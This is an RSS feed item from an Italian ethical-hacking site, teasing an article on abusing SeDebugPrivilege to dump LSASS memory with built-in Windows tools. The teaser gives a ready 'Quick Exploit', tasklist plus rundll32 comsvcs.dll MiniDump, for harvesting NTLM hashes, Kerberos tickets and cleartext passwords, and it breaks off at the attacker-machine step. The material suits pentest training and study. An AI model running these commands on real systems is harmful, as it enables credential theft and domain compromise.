<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Lsass-Dump on Ethical Hacking | Pentest e Sicurezza Informatica | Hackita</title><link>https://hackita.it/tags/lsass-dump/</link><description>Recent content in Lsass-Dump on Ethical Hacking | Pentest e Sicurezza Informatica | Hackita</description><generator>Hugo</generator><language>it</language><lastBuildDate>Tue, 02 Jun 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://hackita.it/tags/lsass-dump/index.xml" rel="self" type="application/rss+xml"/><item><title>SeDebugPrivilege: Privilege Escalation con Dump LSASS con LOLBins</title><link>https://hackita.it/articoli/sedebugprivilege/</link><pubDate>Tue, 02 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackita.it/articoli/sedebugprivilege/</guid><description>&lt;p&gt;Hai una shell admin elevata e &lt;code&gt;whoami /priv&lt;/code&gt; mostra &lt;code&gt;SeDebugPrivilege Enabled&lt;/code&gt;. In due comandi dumpi lsass.exe e ottieni hash NTLM, ticket Kerberos e password in chiaro di ogni utente loggato — inclusi gli admin di dominio in sessione. Zero tool esterni necessari: &lt;code&gt;comsvcs.dll&lt;/code&gt; è già su ogni Windows.&lt;/p&gt;
&lt;hr&gt;
&lt;h2
 id="quick-exploit" class="group/anchor-heading"&gt;
 Quick Exploit
 &lt;a href="#quick-exploit" class="text-inherit opacity-0 group-hover/anchor-heading:opacity-100 decoration-transparent"&gt;#&lt;/a&gt;
&lt;/h2&gt;

&lt;div class="shadow-xl border border-primary h-fit rounded-md"&gt;
 &lt;div 
 class="w-full rounded-t-md py-3 px-[0.8571429em] header-glass flex justify-between items-center"&gt;
 &lt;div class="flex gap-x-2"&gt;
 &lt;span class="size-3 bg-red-500 rounded-full"&gt;&lt;/span&gt;
 &lt;span class="size-3 bg-yellow-500 rounded-full"&gt;&lt;/span&gt;
 &lt;span class="size-3 bg-green-500 rounded-full"&gt;&lt;/span&gt;
 &lt;/div&gt;
 &lt;span class="uppercase text-sm"&gt;cmd&lt;/span&gt;
 &lt;/div&gt;
 &lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-cmd" data-lang="cmd"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;tasklist &lt;span class="p"&gt;|&lt;/span&gt; findstr lsass
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump [PID] C:\temp\lsass.dmp full&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Su macchina attaccante:&lt;/p&gt;</description></item></channel></rss>